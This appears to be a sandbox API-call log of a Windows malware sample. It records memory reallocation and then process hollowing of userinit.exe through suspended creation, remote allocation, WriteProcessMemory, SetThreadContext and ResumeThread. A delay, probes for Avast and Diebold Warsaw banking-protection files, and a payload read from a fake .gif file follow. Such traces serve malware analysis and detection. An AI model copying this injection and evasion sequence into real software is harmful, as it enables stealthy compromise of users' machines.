[0199.064] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.064] GlobalUnlock (hMem=0x95000c) returned 0
[0199.065] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0199.065] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.065] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.065] GlobalUnlock (hMem=0x95000c) returned 0
[0199.066] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0199.066] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.066] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.066] GlobalUnlock (hMem=0x95000c) returned 0
[0199.066] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0199.066] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.067] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.067] GlobalUnlock (hMem=0x95000c) returned 0
[0199.067] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0199.067] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.068] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.068] GlobalUnlock (hMem=0x95000c) returned 0
[0199.068] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0199.068] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.069] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.069] GlobalUnlock (hMem=0x95000c) returned 0
[0199.069] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0199.069] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.070] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.070] GlobalUnlock (hMem=0x95000c) returned 0
[0199.070] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0199.070] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.071] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.071] GlobalUnlock (hMem=0x95000c) returned 0
[0199.071] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0199.071] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.072] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.072] GlobalUnlock (hMem=0x95000c) returned 0
[0199.072] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0199.072] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.073] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.073] GlobalUnlock (hMem=0x95000c) returned 0
[0199.073] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0199.073] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.074] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.074] GlobalUnlock (hMem=0x95000c) returned 0
[0199.074] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0199.074] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.075] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.075] GlobalUnlock (hMem=0x95000c) returned 0
[0199.075] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0199.075] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0199.076] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x13c, hThread=0x140, dwProcessId=0x8e8, dwThreadId=0x8e4)) returned 1
[0199.079] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0199.080] GetThreadContext (in: hThread=0x140, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x802be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x22fab8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0199.080] ReadProcessMemory (in: hProcess=0x13c, lpBaseAddress=0x7ffd5008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0199.080] VirtualAllocEx (hProcess=0x13c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0199.080] VirtualAlloc (lpAddress=0x1bd0000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1bd0000
[0199.087] WriteProcessMemory (in: hProcess=0x13c, lpBaseAddress=0x400000, lpBuffer=0x1bcfad4*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1bcfad4*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0199.100] WriteProcessMemory (in: hProcess=0x13c, lpBaseAddress=0x7ffd5008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0199.100] SetThreadContext (hThread=0x140, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x22fab8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0199.101] ResumeThread (hThread=0x140) returned 0x1
[0199.137] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.137] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0199.137] GlobalUnlock (hMem=0x95000c) returned 0
[0199.137] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0199.137] GlobalUnlock (hMem=0x950004) returned 0
[0199.144] Sleep (dwMilliseconds=0xe74e)
[0209.159] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0209.159] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0209.159] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0209.159] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0209.159] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148
[0209.159] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0209.159] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0209.160] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0209.160] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0209.162] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0209.162] ReadFile (in: hFile=0x148, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0209.169] CloseHandle (hObject=0x148) returned 1
[0209.169] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.170] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.170] GlobalUnlock (hMem=0x95000c) returned 0
[0209.170] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0209.170] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.171] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.171] GlobalUnlock (hMem=0x95000c) returned 0
[0209.171] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0209.171] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0209.172] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0209.172] GlobalUnlock (hMem=0x95000c) returned 0
